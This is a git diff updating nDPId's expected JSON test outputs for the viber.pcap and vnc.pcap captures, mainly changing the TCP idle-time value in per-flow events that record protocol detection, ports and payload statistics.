00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155670640,"flow_last_seen":1527155670672,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1527155641697,"flow_last_seen":1527155647390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":9565,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1527155641697,"flow_last_seen":1527155647390,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":9565,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"}} 00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155685757,"flow_last_seen":1527155685757,"flow_idle_time":120000,"flow_min_l4_payload_len":1480,"flow_max_l4_payload_len":1480,"flow_tot_l4_payload_len":2960,"flow_avg_l4_payload_len":1480,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1527155648513,"flow_last_seen":1527155648748,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6479,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"151.101.1.130","src_port":55746,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1527155638428,"flow_last_seen":1527155685200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":591,"flow_tot_l4_payload_len":5517,"flow_avg_l4_payload_len":95,"midstream":1,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"52.0.253.101","src_port":33208,"dst_port":4244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":89,"flow_first_seen":1527155641845,"flow_last_seen":1527155647484,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":58768,"flow_avg_l4_payload_len":660,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"}} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1527155648513,"flow_last_seen":1527155648748,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6479,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"151.101.1.130","src_port":55746,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1527155638428,"flow_last_seen":1527155685200,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":591,"flow_tot_l4_payload_len":5517,"flow_avg_l4_payload_len":95,"midstream":1,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"52.0.253.101","src_port":33208,"dst_port":4244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":89,"flow_first_seen":1527155641845,"flow_last_seen":1527155647484,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":58768,"flow_avg_l4_payload_len":660,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"}} 00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155647500,"flow_last_seen":1527155647500,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip6","src_ip":"fe80::3207:4dff:fea3:5fa7","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155646968,"flow_last_seen":1527155666982,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155639005,"flow_last_seen":1527155639008,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":261,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35283,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Advertisement"}} 00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155646819,"flow_last_seen":1527155646840,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35331,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155641574,"flow_last_seen":1527155641691,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":37418,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"}} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155638474,"flow_last_seen":1527155638476,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":45743,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155670632,"flow_last_seen":1527155677899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":45424,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155670632,"flow_last_seen":1527155677899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":45424,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1527155671066,"flow_last_seen":1527155672061,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7577,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155670632,"flow_last_seen":1527155677899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":45424,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155670632,"flow_last_seen":1527155677899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":45424,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1527155671066,"flow_last_seen":1527155672061,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7577,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155685529,"flow_last_seen":1527155685530,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":50097,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1527155679411,"flow_last_seen":1527155685088,"flow_idle_time":180000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":4410,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} 00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155679411,"flow_last_seen":1527155679443,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1527155646850,"flow_last_seen":1527155680789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":972,"flow_tot_l4_payload_len":6977,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1527155646850,"flow_last_seen":1527155680789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":972,"flow_tot_l4_payload_len":6977,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155648481,"flow_last_seen":1527155648506,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":44376,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155639234,"flow_last_seen":1527155639237,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":331,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":62872,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155679410,"flow_last_seen":1527155685132,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":33744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155679410,"flow_last_seen":1527155685132,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":33744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155679410,"flow_last_seen":1527155685132,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":33744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155679410,"flow_last_seen":1527155685132,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":33744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155641813,"flow_last_seen":1527155641840,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":40445,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"}} 00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","packets-captured":424,"packets-processed":420,"total-skipped-flows":0,"total-l4-data-len":122215,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":23,"total-detection-updates":17,"total-updates":0,"current-active-flows":0,"total-active-flows":26,"total-idle-flows":26,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":165,"global_ts_msec":1527155685757} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ diff --git a/test/results/vnc.pcap.out b/test/results/vnc.pcap.out index d0bfdab97..41f6275a8 100644 --- a/test/results/vnc.pcap.out +++ b/test/results/vnc.pcap.out @@ -1,17 +1,17 @@ 00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"vnc.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"vnc.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1476111264364} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1476111264364,"flow_last_seen":1476111264364,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1476111264364,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":59791,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1476111264364,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1476111264364,"pkt":"EP7tAkntxOodxQGGCABFAAA0Xs1AAHQGVCNf7TDQwKgCbumPGvTqxTBkAAAAAIACIADbnAAAAgQFrAEDAwIBAQQC"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1476111264364,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1476111264364,"pkt":"xOodxQGGEP7tAkntCABFAAA0fFNAAIAGAADAqAJuX+0w0Br06Y8QfmeF6sUwZYASIABT+gAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1476111264402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1476111264402,"pkt":"EP7tAkntxOodxQGGCABFAAAoXs5AAHQGVC5f7TDQwKgCbumPGvTqxTBlEH5nhlAQQTqDEwAAAAAAAAAA"} -00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1476111264364,"flow_last_seen":1476111264453,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1476111264453,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":59791,"dst_port":6900,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3544,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1476111286462,"flow_last_seen":1476111286462,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1476111286462,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":51559,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3544,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1476111286462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1476111286462,"pkt":"EP7tAkntxOodxQGGCABFAAA0be5AAHQGRQJf7TDQwKgCbslnGvTjPDftAAAAAIACIAD7xAAAAgQFrAEDAwIBAQQC"} 